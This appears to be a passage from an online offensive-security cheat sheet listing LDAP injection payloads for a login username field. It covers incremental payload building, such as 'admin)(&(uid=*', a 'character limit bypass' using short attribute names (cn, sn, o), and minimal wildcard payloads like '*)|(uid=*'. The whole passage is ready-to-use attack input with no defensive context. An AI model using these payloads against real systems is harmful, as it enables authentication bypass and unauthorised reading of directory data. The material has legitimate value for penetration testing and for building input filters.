username: u*)|(mail=*
# Incremental payload building
# Request 1:
username: admin*
# Request 2 (if first succeeds):
username: admin)(&(uid=*
# Request 3:
username: admin)(&(uid=admin*Character Limit Bypass:
# Abbreviated attributes
username: admin)(&(cn=* # Short for commonName
username: admin)(&(sn=* # Short for surname
username: admin)(&(o=* # Short for organization
# Minimal viable payloads
username: *)|(uid=*
username: x*)|(cn=*
username: *)|(o=*Last updated
Was this helpful?